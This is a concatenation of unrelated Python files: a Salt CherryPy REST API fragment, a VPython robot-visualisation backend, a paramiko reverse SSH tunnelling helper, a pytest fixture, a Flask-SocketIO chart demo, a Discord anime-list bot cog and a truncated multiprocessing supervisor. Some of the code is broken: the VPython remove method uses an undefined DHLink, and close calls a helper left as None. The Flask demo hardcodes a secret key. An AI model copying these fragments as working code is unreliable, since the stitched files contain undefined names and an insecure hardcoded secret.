tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
# Late import
try:
from cherrypy.lib import cpstats
except ImportError:
                logger.error('Import of cherrypy.lib.cpstats failed. Possible '
'upstream bug here: https://github.com/cherrypy/cherrypy/issues/1444')
return {}
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
        .. http:get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
default_index = os.path.abspath(os.path.join(
os.path.dirname(__file__), 'index.html'))
return cherrypy.lib.static.serve_file(
apiopts.get('app', default_index))
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in six.iteritems(self.url_map):
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'engine.timeout_monitor.on': self.apiopts.get(
'expire_responses', True),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
'log.access_file': self.apiopts.get('log_access_file', ''),
'log.error_file': self.apiopts.get('log_error_file', ''),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
    Return the CherryPy root object along with the rest_cherrypy options and
    the CherryPy configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
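# Mounting sketch (illustrative only; the exact wiring is handled by salt-api
# and may differ between releases):
#
#   root, apiopts, cpyopts = get_app(master_opts)  # master_opts: master config dict
#   cherrypy.quickstart(root, apiopts.get('root_prefix', '/'), cpyopts)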
|
VPython.py
|
#!/usr/bin/env python
"""
@author Micah Huth
"""
import importlib
import threading
import glob
import os
import platform
import warnings
from time import perf_counter, sleep
import imageio
from roboticstoolbox.backends.Connector import Connector
_GraphicsCanvas3D = None
_GraphicsCanvas2D = None
_GraphicalRobot = None
close_localhost_session = None
try:
from roboticstoolbox.backends.VPython.canvas import GraphicsCanvas2D, GraphicsCanvas3D
from roboticstoolbox.backends.VPython.graphicalrobot import GraphicalRobot
except ImportError:
print(
'\nYou must install the VPython component of the toolbox, do: \n'
'pip install roboticstoolbox[vpython]\n\n')
class VPython(Connector): # pragma nocover
"""
Graphical backend using VPython
VPython is a Python API that connects to a JavaScript/WebGL 3D graphics
engine in a browser tab. It supports many 3D graphical primitives
    including meshes, boxes, ellipsoids and lines. It can render in
full color.
Example:
.. code-block:: python
:linenos:
import roboticstoolbox as rtb
robot = rtb.models.DH.Panda() # create a robot
pyplot = rtb.backends.VPython() # create a VPython backend
pyplot.add(robot) # add the robot to the backend
robot.q = robot.qz # set the robot configuration
pyplot.step() # update the backend and graphical view
:references:
- https://vpython.org
"""
# TODO be able to add ellipsoids (vellipse, fellipse)
# TODO be able add lines (for end-effector paths)
def __init__(self, **kwargs):
"""
Open a localhost session with no canvases
"""
super(VPython, self).__init__()
# Init vars
self.canvases = []
        # 2D array of [is_3d, height, width, title, caption, grid, g_col] per canvas
self.canvas_settings = []
self.robots = []
self._recording = False
self._recording_thread = None
self._recording_fps = None
self._thread_lock = threading.Lock()
self.launch_options = kwargs # save launch options
self._create_empty_session()
def launch(
self, **kwargs):
"""
Launch a graphical backend in a browser tab
        ``env = launch(args)`` creates a 3D scene in a new browser tab as
        defined by ``args`` and returns a reference to the backend.
"""
# merge instantiation & launch options
args = {**self.launch_options, **kwargs}
is_3d = args.get('is_3d', True)
height = args.get('height', 500)
width = args.get('width', 888)
title = args.get('title', 'Robotics Toolbox for Python: VPython display')
caption = args.get('caption', '')
grid = args.get('grid', False)
g_col = args.get('g_col', None)
super().launch()
self.canvas_settings.append(
[is_3d, height, width, title, caption, grid, g_col])
# Create the canvas with the given information
if is_3d:
self.canvases.append(
GraphicsCanvas3D(height, width, title, caption,
grid, g_col))
else:
self.canvases.append(
GraphicsCanvas2D(height, width, title, caption,
grid, g_col))
def step(self, dt=None, id=None, q=None, fig_num=0):
"""
Update the graphical scene
:param id: The Identification of the robot to move. Can be either the
DHRobot or GraphicalRobot
:type id: :class:`~roboticstoolbox.robot.DHRobot.DHRobot`,
:class:`roboticstoolbox.backends.VPython.graphics_robot.GraphicalRobot`
:param q: The joint angles/configuration of the robot (Optional, if not
supplied will use the stored q values).
:type q: float ndarray(n)
        :param fig_num: The canvas index to update, defaults to
            the initial one
:type fig_num: int, optional
:raises ValueError: Figure number must be between 0 and total number of
canvases
:raises TypeError: Input must be a DHLink or GraphicalRobot
``env.step(args)`` triggers an update of the 3D scene in the browser
window referenced by ``env``.
.. note::
- Each robot in the scene is updated based on
their control type (position, velocity, acceleration, or torque).
- Upon acting, the other three of the four control types will be
updated in the internal state of the robot object.
- The control type is defined by the robot object, and not all
robot objects support all control types.
- Execution is blocked for the specified interval
"""
super().step()
if fig_num < 0 or fig_num >= len(self.canvases):
raise ValueError(
"Figure number must be between 0 and total number of canvases")
# If GraphicalRobot given
if isinstance(id, GraphicalRobot):
if self.canvases[fig_num].is_robot_in(id):
poses = id.fkine(q)
id.set_joint_poses(poses)
# If DHRobot is given (or equivalent)
else:
            graphical_dh_robot = None
# If no ID given, and there are robots available
if id is None and len(self.robots) > 0:
# Obtain the first one
                graphical_dh_robot = self.robots[0]
# If no ID, and no robots available
elif id is None:
print("No robot found")
return
else:
# Find first occurrence of it that is in the correct canvas
for i in range(len(self.robots)):
if self.robots[i].robot is id and \
self.canvases[fig_num].is_robot_in_canvas(
self.robots[i]):
                        graphical_dh_robot = self.robots[i]
break
# If no graphical equivalent found, return
            if graphical_dh_robot is None:
print("No robot found")
return
# Set poses of graphical robot
            poses = graphical_dh_robot.fkine(q)
            graphical_dh_robot.set_joint_poses(poses)
if dt is not None:
sleep(dt)
def reset(self):
"""
Reset the graphical scene
``env.reset()`` triggers a reset of the 3D scene in the browser window
referenced by ``env``. It is restored to the original state defined by
``launch()``.
"""
super().reset()
if len(self.canvases) > 0:
# Clear localhost
self.canvases[0].scene.append_to_caption('''
<script type="text/javascript">
let gs = document.getElementById('glowscript');
gs.innerHTML = '';
</script>
''')
# Delete all sessions
self.canvases = []
self._create_empty_session()
for settings in self.canvas_settings:
# Create the canvas with the given information
if settings[0]:
self.canvases.append(GraphicsCanvas3D(
settings[1], settings[2], settings[3],
settings[4], settings[5]))
else:
self.canvases.append(GraphicsCanvas2D(
settings[1], settings[2], settings[3],
settings[4], settings[5]))
def restart(self):
"""
Restart the graphics display
``env.restart()`` triggers a restart of the browser view referenced by
``env``. It is closed and relaunched to the original state defined by
``launch()``.
"""
super().restart()
self.reset()
def close(self):
"""
Close the graphics display
        ``env.close()`` gracefully closes the browser tab
referenced by ``env``.
"""
super().close()
# Close session
if len(self.canvases) > 0:
# if a canvas made
close_localhost_session(self.canvases[0])
else:
# No canvas, so make one
temp = GraphicsCanvas2D()
close_localhost_session(temp)
self.canvases = []
def add(self, dhrobot, fig_num=0, name=None, **kwargs):
"""
Add a robot to the graphical scene
:param dhrobot: The ``DHRobot`` object (if applicable)
:type dhrobot: class:`~roboticstoolbox.robot.DHRobot.DHRobot`, None
:param fig_num: The canvas number to place the robot in
:type fig_num: int
:param name: The name of the robot
:type name: `str`
:raises ValueError: Figure number must be between 0 and number of
figures created
:return: object id within visualizer
:rtype: int
``id = env.add(robot)`` adds the ``robot`` to the graphical
environment.
.. note::
- ``robot`` must be of an appropriate class.
- Adds the robot object to a list of robots which will be updated
when the ``step()`` method is called.
"""
# TODO - name can come from the robot object, maybe an override name?
# Micah: "Name is used from robot class, unless robot is not given"
# TODO - why dhrobot "if applicable"?
# Micah: "It's possible to create a graphical robot
# in VPython not using a robot class."
# TODO - what about other classes of robot?
# Micah: "I use specific parameters in dhrobots.
# If they exist in other robot classes, it should work."
# TODO - what about adding ellipsoids?
super().add()
if name is None:
name = dhrobot.name
# Sanity check input
if fig_num < 0 or fig_num > len(self.canvases) - 1:
raise ValueError(
"Figure number must be between 0 and number "
"of figures created")
# Add robot to canvas
self.robots.append(
GraphicalRobot(self.canvases[fig_num], name, dhrobot))
# self.canvases[fig_num].add_robot(self.robots[len(self.robots)-1])
def remove(self, id, fig_num=0):
"""
        Remove a robot from the graphical scene
:param id: The id of the robot to remove. Can be either the DHLink or
GraphicalRobot
:type id: class:`~roboticstoolbox.robot.DHRobot.DHRobot`,
class:`roboticstoolbox.backends.VPython.graphics_robot.GraphicalRobot`
:param fig_num: The canvas index to delete the robot from, defaults to
the initial one
:type fig_num: int, optional
:raises ValueError: Figure number must be between 0 and total number
of canvases
:raises TypeError: Input must be a DHLink or GraphicalRobot
``env.remove(robot)`` removes the ``robot`` from the graphical
environment.
"""
super().remove()
if fig_num < 0 or fig_num >= len(self.canvases):
raise ValueError(
"Figure number must be between 0 and total number of canvases")
# If DHLink given
if isinstance(id, DHLink):
robot = None
# Find first occurrence of it that is in the correct canvas
for i in range(len(self.robots)):
if self.robots[i].seriallink.equal(id) and \
self.canvases[fig_num].is_robot_in(self.robots[i]):
robot = self.robots[i]
break
if robot is None:
return
else:
self.canvases[fig_num].delete_robot(robot)
# ElseIf GraphicalRobot given
elif isinstance(id, GraphicalRobot):
if self.canvases[fig_num].is_robot_in(id):
self.canvases[fig_num].delete_robot(id)
# Else
else:
raise TypeError("Input must be a DHLink or GraphicalRobot")
def hold(self): # pragma: no cover
'''
hold() keeps the tab open i.e. stops the tab from closing once
the main script has finished.
'''
while True:
pass
def _add_teach_panel(self):
# just need to change the display mode
self.canvases[0].teach_mode(True)
#
# Public non-standard methods
#
def record_start(self, fps, scene_num=0):
"""
Start recording screencaps of a scene
"""
self._thread_lock.acquire()
if not self._recording:
print("VPython Recording...")
if fps > 10:
                warnings.warn("The chosen recording fps ({0}) could result in lagging video quality. "
"Consider lowering fps and robot speed (e.g. 5fps)".format(fps), RuntimeWarning)
self._recording = True
self._recording_fps = fps
# Spawn a thread
self._recording_thread = threading.Thread(target=self._record_scene, args=(scene_num, fps,))
self._recording_thread.start()
self._thread_lock.release()
def record_stop(self, filename, save_fps=None):
"""
Stop recording screencaps of a scene and combine them into a movie
        ``save_fps`` may differ from the recording fps; the media file is written at the given save fps.
"""
#
self._thread_lock.acquire()
if self._recording:
self._recording = False
print("VPython Recording Stopped...")
print("VPython Recording Saving... DO NOT EXIT")
else:
self._thread_lock.release()
return
self._thread_lock.release()
# Wait for thread to finish
self._recording_thread.join()
sleep(3) # Quick sleep to ensure all downloads are done
# (higher framerates can lag behind)
# Get downloads directory
opsys = platform.system()
if opsys == 'Windows': # Windows
path_in = os.path.join(os.getenv('USERPROFILE'), 'downloads')
elif opsys == 'Linux' or opsys == 'Darwin': # Linux / Mac
path_in = os.path.join(os.getenv('HOME'), 'downloads')
else: # Undefined OS
            # let's assume 'HOME' for now
path_in = os.path.join(os.getenv('HOME'), 'downloads')
fp_out = filename
fp_in = path_in + "/vpython_*.png"
files = [file for file in glob.glob(fp_in)]
if save_fps is None:
save_fps = self._recording_fps
writer = imageio.get_writer(fp_out, fps=save_fps)
for f in files:
writer.append_data(imageio.imread(f)) # Add it to the video
os.remove(f) # Clean up file
writer.close()
print("VPython Recording Saved... It is safe to exit")
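    # Usage sketch for the recording helpers above (illustrative only; the
    # robot, trajectory and filename below are placeholders):
    #
    #   env = VPython()
    #   env.launch()
    #   env.add(robot)
    #   env.record_start(fps=5)
    #   for q in trajectory:
    #       robot.q = q
    #       env.step(0.05)
    #   env.record_stop('movie.mp4')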
#
# Private Methods
#
@staticmethod
def _create_empty_session():
"""
Create a canvas to ensure the localhost session has been opened.
Then clear the browser tab
"""
# Create a canvas to initiate the connection
temp = GraphicsCanvas3D()
# Delete the canvas to leave a blank screen
temp.scene.append_to_caption('''
<script type="text/javascript">
let gs = document.getElementById('glowscript');
gs.innerHTML = '';
</script>
''')
def _record_scene(self, scene_num, fps):
"""
Thread-called function to continuously record screenshots
"""
frame_num = 0
if fps <= 0:
raise ValueError("fps must be greater than 0.")
f = 1 / fps
self._thread_lock.acquire()
recording = self._recording
self._thread_lock.release()
while recording:
# Get current time
t_start = perf_counter()
# Take screenshot
filename = "vpython_{:04d}.png".format(frame_num)
self.canvases[scene_num].take_screenshot(filename)
frame_num += 1
# Get current time
t_stop = perf_counter()
# Wait for time of frame to finish
# If saving takes longer than frame frequency, this while is skipped
while t_stop - t_start < f:
t_stop = perf_counter()
self._thread_lock.acquire()
recording = self._recording
self._thread_lock.release()
|
tunneling.py
|
"""
This file provides remote port forwarding functionality using the paramiko package.
Inspired by: https://github.com/paramiko/paramiko/blob/master/demos/rforward.py
"""
import select
import socket
import sys
import threading
from io import StringIO
import warnings
import paramiko
DEBUG_MODE = False
def handler(chan, host, port):
sock = socket.socket()
try:
sock.connect((host, port))
except Exception as e:
verbose("Forwarding request to {}:{} failed: {}".format(host, port, e))
return
verbose(
"Connected! Tunnel open {} -> {} -> {}".format(chan.origin_addr,
chan.getpeername(),
(host, port))
)
while True:
r, w, x = select.select([sock, chan], [], [])
if sock in r:
data = sock.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
sock.send(data)
chan.close()
sock.close()
verbose("Tunnel closed from {}".format(chan.origin_addr,))
def reverse_forward_tunnel(server_port, remote_host, remote_port, transport):
transport.request_port_forward("", server_port)
while True:
chan = transport.accept(1000)
if chan is None:
continue
thr = threading.Thread(target=handler, args=(chan, remote_host, remote_port))
        thr.daemon = True
thr.start()
def verbose(s):
if DEBUG_MODE:
print(s)
def create_tunnel(payload, local_server, local_server_port):
client = paramiko.SSHClient()
# client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.set_missing_host_key_policy(paramiko.WarningPolicy())
verbose(
"Connecting to ssh host {}:{} ...".format(payload["host"], int(payload[
"port"]))
)
try:
with warnings.catch_warnings():
warnings.simplefilter("ignore")
client.connect(
hostname=payload["host"],
port=int(payload["port"]),
username=payload["user"],
pkey=paramiko.RSAKey.from_private_key(StringIO(payload["key"])),
)
except Exception as e:
        print(
            "*** Failed to connect to {}:{}: {}".format(
                payload["host"], int(payload["port"]), e
            )
        )
sys.exit(1)
verbose(
"Now forwarding remote port {} to {}:{} ...".format(int(payload[
"remote_port"]),
local_server,
local_server_port)
)
thread = threading.Thread(
target=reverse_forward_tunnel,
args=(
int(payload["remote_port"]),
local_server,
local_server_port,
client.get_transport(),
),
daemon=True,
)
thread.start()
return payload["share_url"]
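# Usage sketch (illustrative only): the payload keys below mirror what
# create_tunnel() reads; host, ports and the key are placeholders, and the
# private key must be a real PEM-encoded RSA key for the connection to work.
if __name__ == "__main__":
    example_payload = {
        "host": "ssh.example.com",
        "port": 22,
        "user": "tunnel",
        "key": "-----BEGIN RSA PRIVATE KEY-----\n...\n-----END RSA PRIVATE KEY-----",
        "remote_port": 9000,
        "share_url": "https://ssh.example.com:9000",
    }
    # Forward remote port 9000 on the SSH host to a local server on port 7860.
    share_url = create_tunnel(example_payload, "127.0.0.1", 7860)
    print("Tunnel established, reachable at", share_url)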
|
conftest.py
|
from multiprocessing import Process
import os
import signal
from time import sleep
from typing import List
import pytest
@pytest.fixture
def run_cli(capfd):
"""Run a command in the `optimade-client` CLI (through the Python API)."""
def _run_cli(options: List[str] = None, raises: bool = False) -> str:
"""Run a command in the `optimade-client` CLI (through the Python API)."""
from optimade_client.cli import run
if options is None:
options = []
try:
cli = Process(target=run.main, args=(options,))
cli.start()
sleep(5) # Startup time
output = capfd.readouterr()
finally:
os.kill(cli.pid, signal.SIGINT)
timeout = 10 # seconds
while cli.is_alive() and timeout:
sleep(1)
timeout -= 1
if cli.is_alive():
cli.kill()
cli.join()
sleep(1)
assert not cli.is_alive(), f"Could not stop CLI subprocess <PID={cli.pid}>"
if raises:
assert (
cli.exitcode != 0
), f"\nstdout:\n{output.out}\n\nstderr:\n{output.err}"
else:
assert (
cli.exitcode == 0
), f"\nstdout:\n{output.out}\n\nstderr:\n{output.err}"
return output.out + output.err
return _run_cli
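# Example usage from a test module (hypothetical test, shown for illustration;
# the exact options and expected output depend on the CLI):
#
#   def test_cli_starts(run_cli):
#       output = run_cli()
#       assert "Traceback" not in output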
|
main.py
|
from flask import Flask, render_template
from flask_socketio import SocketIO, send, emit
import json
import time
import random
import threading
# Required for server-side emit() to work
import eventlet
eventlet.monkey_patch()
app = Flask(__name__)
app.config['SECRET_KEY'] = 'dreamchaser'
socketio = SocketIO(app)
@app.route("/")
def index():
title = "Example Chart"
return render_template("index.html", title=title)
def produce_chart_data():
while True:
        # Sleep briefly between emits to show the server keeps serving asynchronously
time.sleep(0.1)
        # Get some data from the source and emit it to clients when received
data = get_some_data()
socketio.emit('new-chart-data', data)
print("Emit data")
def get_some_data():
data = {
"series": [
{
"name": 'Data 1',
"data": [
{"x": 143034652600, "y": random.random()*10+70},
{"x": 143134652600, "y": random.random()*10+70},
{"x": 143234652600, "y": random.random()*10+70},
{"x": 143334652600, "y": random.random()*10+70},
{"x": 143434652600, "y": random.random()*10+70},
{"x": 143534652600, "y": random.random()*10+70},
{"x": 143634652600, "y": random.random()*10+70},
{"x": 143734652600, "y": random.random()*10+70},
{"x": 143834652600, "y": random.random()*10+70},
{"x": 143934652600, "y": random.random()*10+70}
]
}, {
"name": 'Data 2',
"data": [
{"x": 143034652600, "y": random.random()*10+40},
{"x": 143134652600, "y": random.random()*10+40},
{"x": 143234652600, "y": random.random()*10+40},
{"x": 143334652600, "y": random.random()*10+40},
{"x": 143434652600, "y": random.random()*10+40},
{"x": 143534652600, "y": random.random()*10+40},
{"x": 143634652600, "y": random.random()*10+40},
{"x": 143734652600, "y": random.random()*10+40},
{"x": 143834652600, "y": random.random()*10+40},
{"x": 143934652600, "y": random.random()*10+40}
]
}, {
"name": 'Data 3',
"data": [
{"x": 143034652600, "y": random.random()*10+25},
{"x": 143134652600, "y": random.random()*10+25},
{"x": 143234652600, "y": random.random()*10+25},
{"x": 143334652600, "y": random.random()*10+25},
{"x": 143434652600, "y": random.random()*10+25},
{"x": 143534652600, "y": random.random()*10+25},
{"x": 143634652600, "y": random.random()*10+25},
{"x": 143734652600, "y": random.random()*10+25},
{"x": 143834652600, "y": random.random()*10+25},
{"x": 143934652600, "y": random.random()*10+25}
]
            }, {
                "name": 'Data 4',
"data": [
{"x": 143034652600, "y": random.random()*10+25},
{"x": 143134652600, "y": random.random()*10+25},
{"x": 143234652600, "y": random.random()*10+25},
{"x": 143334652600, "y": random.random()*10+25},
{"x": 143434652600, "y": random.random()*10+25},
{"x": 143534652600, "y": random.random()*10+25},
{"x": 143634652600, "y": random.random()*10+25},
{"x": 143734652600, "y": random.random()*10+25},
{"x": 143834652600, "y": random.random()*10+25},
{"x": 143934652600, "y": random.random()*10+25}
]
}
]}
return data
if __name__ == '__main__':
t = threading.Thread(target=produce_chart_data)
t.start()
PORT = json.load(open('config.json'))["PORT"]
print("Running on localhost:"+str(PORT))
socketio.run(app, host='0.0.0.0', port=PORT)
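# A minimal client-side consumer sketch (assumes the third-party
# python-socketio package is installed and that PORT in config.json is 5000):
#
#   import socketio
#
#   sio = socketio.Client()
#
#   @sio.on('new-chart-data')
#   def on_chart_data(data):
#       print('received', len(data['series']), 'series')
#
#   sio.connect('http://localhost:5000')
#   sio.wait()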
|
usercog.py
|
import io
from datetime import datetime, timedelta
from threading import Thread
import discord
import jikanpy
import timeago
from discord.ext import tasks, commands
from jikanpy import Jikan
from tqdm import tqdm
from naotomori.util import jikanCall
class UserCog(commands.Cog):
"""
UserCog: handles all the user-related logic.
"""
def __init__(self, bot):
"""
Constructor: initialize the cog.
:param bot: The Discord bot.
"""
self.bot = bot
self.discordUser = None
self.malUser = None
self.channel = None
self.jikan = Jikan()
self.progress = io.StringIO("⌛ Please wait a bit")
self.lastUpdated = None
@commands.command(brief='Ping the bot')
async def ping(self, ctx):
"""
Ping the bot.
:param ctx: The context.
"""
await ctx.send(f'Pong: {round(self.bot.latency * 1000)}ms')
def start(self):
"""
Start the UserCog:
- retrieves the user from the database, if possible
- start the updateMalProfileLoop
"""
user = self.bot.get_cog('DatabaseCog').getUser()
if user[0] != '':
try:
self.malUser = self._getMALProfile(user[0])
except jikanpy.exceptions.APIException:
pass
self.discordUser = self._getMember(user[1])
if user[2] != '':
self.channel = self._getChannel(user[2])
if user[3] != '':
self.bot.command_prefix = user[3]
if not self.updateMalProfileLoop.is_running():
self.updateMalProfileLoop.start()
def _getMALProfile(self, username):
"""
Get the MyAnimeList user object, given the username.
:param username: The username of the MAL account.
:return: The MAL user.
"""
return jikanCall(self.jikan.user, username=username)
def _updateMALProfile(self, profile):
"""
        Update the internal MAL user, i.e. refresh the watching/reading lists.
:param profile: The username of the MAL account.
"""
try:
newAnimeList = []
newMangaList = []
watching = jikanCall(self.jikan.user, username=profile, request='animelist', argument='watching')['anime']
ptw = jikanCall(self.jikan.user, username=profile, request='animelist', argument='ptw')['anime']
reading = jikanCall(self.jikan.user, username=profile, request='mangalist', argument='reading')['manga']
ptr = jikanCall(self.jikan.user, username=profile, request='mangalist', argument='ptr')['manga']
pbar = None
if self.progress:
# Set up progressbar in case it is the first time setting the user's profile
pbar = tqdm(
total=len(watching) + len(ptw) + len(reading) + len(ptr), file=self.progress, ncols=40,
bar_format="⌛{desc}: {n_fmt}/{total_fmt} [Remaining: {remaining}]"
)
for anime in watching + ptw:
anime['title_english'] = jikanCall(self.jikan.anime, id=anime['mal_id'])['title_english']
newAnimeList.append(anime)
if self.progress:
self.progress.truncate(0) # clear previous output
self.progress.seek(0)
pbar.update()
for manga in reading + ptr:
manga['title_english'] = jikanCall(self.jikan.manga, id=manga['mal_id'])['title_english']
newMangaList.append(manga)
if self.progress:
self.progress.truncate(0)
self.progress.seek(0)
pbar.update()
# If for some reason, we cannot retrieve the new lists (e.g. API error), keep the old ones
# In other words, only update the lists if we can retrieve the new ones
if newAnimeList:
self.bot.get_cog('AnimeCog').list = newAnimeList
if newMangaList:
self.bot.get_cog('MangaCog').list = newMangaList
self.lastUpdated = datetime.now()
except Exception as e:
# There's nothing we can do :'(
print(str(e))
if self.progress:
self.progress.close()
self.progress = None # no need in the future (only need progressbar for the first set up)
def _getMember(self, user):
"""
        Get the Discord member object, given its name and tag.
:param user: The user (name + tag).
:return: The member object, if none can be found, return None.
"""
for member in self.bot.get_all_members():
if str(member) == user:
return member
return None
def _getChannel(self, channelName):
"""
        Get the Discord channel object, given the name of the channel.
:param channelName: The name of the channel.
:return: The channel object, if none can be found, return None.
"""
for channel in self.bot.get_all_channels():
if str(channel) == channelName:
return channel
return None
@commands.command(brief='Set your MAL profile')
async def setProfile(self, ctx, profile: str):
"""
Set the internal MAL account, as well as the discord account and bot channel.
:param ctx: The context.
:param profile: Name of the MAL account.
"""
try:
self.malUser = self._getMALProfile(profile)
except jikanpy.exceptions.APIException:
await ctx.send(f'Unable to find user {profile}, make sure the profile is public.')
return
self.progress = io.StringIO("⌛ Please wait a bit") # start new profile
self.bot.get_cog('AnimeCog').list = []
self.bot.get_cog('MangaCog').list = []
self.discordUser = ctx.author
if self.channel is None:
self.channel = ctx.channel
self.bot.get_cog('DatabaseCog').setChannel(str(self.channel))
# Store data in database
self.bot.get_cog('DatabaseCog').setProfile(profile, str(self.discordUser))
thread = Thread(target=self._updateMALProfile, args=(profile,))
thread.start()
await ctx.send(
'🎉 Successfully set profile, you\'ll now receive notifications for new anime episodes and manga chapters!\n'
            '🍵 It may still take some time for your profile to update, though.'
)
@commands.command(brief='Remove your MAL profile from the bot')
async def removeProfile(self, ctx):
self.bot.get_cog('DatabaseCog').setProfile("", "")
self.discordUser = None
self.malUser = None
self.channel = None
self.bot.get_cog('AnimeCog').list = []
self.bot.get_cog('MangaCog').list = []
await ctx.send('😢 Successfully removed you from the bot!')
@commands.command(brief='Get a brief overview of your MAL profile')
async def getProfile(self, ctx):
"""
        Get the MAL profile in the form of an embed.
:param ctx: The context.
"""
if self.progress and self.malUser:
embed = discord.Embed(title=self.malUser['username'], color=discord.Color.green(), url=self.malUser['url'])
embed.add_field(name="🔧 Setting up profile", value=str(self.progress.getvalue()))
if self.malUser['image_url']:
embed.set_thumbnail(url=self.malUser['image_url'])
await ctx.send(embed=embed)
elif self.malUser:
embed = discord.Embed(title=self.malUser['username'], color=discord.Color.green(), url=self.malUser['url'])
embed.add_field(name="Currently Watching / Plan-to-Watch Anime",
value=str(len(self.bot.get_cog('AnimeCog').list)), inline=False)
embed.add_field(name="Currently Reading / Plan-to-Read Manga",
value=str(len(self.bot.get_cog('MangaCog').list)), inline=False)
if self.lastUpdated:
now = datetime.now() + timedelta(seconds=60 * 3.4)
embed.set_footer(text=f"Last updated: {timeago.format(self.lastUpdated, now)}")
if self.malUser['image_url']:
embed.set_thumbnail(url=self.malUser['image_url'])
await ctx.send(embed=embed)
else:
await ctx.send("Profile is not set, please use `!setProfile <USERNAME>` first.")
@commands.command(brief='Set the bot channel (where it will ping you)')
async def setChannel(self, ctx, channel: discord.TextChannel):
"""
Set the bot channel.
:param ctx: The context.
:param channel: Name of the bot channel.
"""
self.channel = channel
self.bot.get_cog('DatabaseCog').setChannel(str(channel))
await ctx.send(f'📺 Successfully set bot channel to {channel.mention}.')
@commands.command(brief='Set the prefix of the bot')
async def setPrefix(self, ctx, prefix: str):
"""
        Set the prefix of the bot.
:param ctx: The context.
:param prefix: The new prefix for the bot.
"""
self.bot.command_prefix = prefix
self.bot.get_cog('DatabaseCog').setPrefix(prefix)
await ctx.send(f'❗ Successfully set the prefix to `{prefix}`.')
@setChannel.error
async def setChannelError(self, ctx, error):
"""
Error Handler for setChannel.
:param ctx: The context.
:param error: The error raised.
"""
await ctx.send(error.args[0])
@tasks.loop(hours=3)
async def updateMalProfileLoop(self):
"""
        Loop that periodically updates the MAL account, i.e. refreshes the watching/reading lists.
"""
if self.malUser:
thread = Thread(target=self._updateMALProfile, args=(self.malUser['username'],))
thread.start()
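# --- Illustrative sketch, not part of the original cog -----------------------
# setProfile and updateMalProfileLoop hand _updateMALProfile to a threading.Thread
# because the jikanpy calls block. A hedged alternative for the same pattern is to
# push the blocking call onto the default executor so the asyncio event loop stays
# responsive; run_blocking below is a made-up helper, not part of the bot.
import asyncio
async def run_blocking(func, *args):
    """Run a blocking callable on the default thread pool executor."""
    loop = asyncio.get_running_loop()
    return await loop.run_in_executor(None, func, *args)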
|
multiprocess.py
|
import multiprocessing
import os
import signal
import time
HANDLED_SIGNALS = (
signal.SIGINT, # Unix signal 2. Sent by Ctrl+C.
signal.SIGTERM, # Unix signal 15. Sent by `kill <pid>`.
)
class Multiprocess:
def __init__(self, config):
self.config = config
self.workers = config.workers
self.should_exit = False
def handle_exit(self, sig, frame):
self.should_exit = True
def run(self, target, *args, **kwargs):
pid = os.getpid()
logger = self.config.logger_instance
logger.info("Started parent process [{}]".format(pid))
for sig in HANDLED_SIGNALS:
signal.signal(sig, self.handle_exit)
processes = []
for idx in range(self.workers):
process = multiprocessing.Process(target=target, args=args, kwargs=kwargs)
process.start()
processes.append(process)
while (
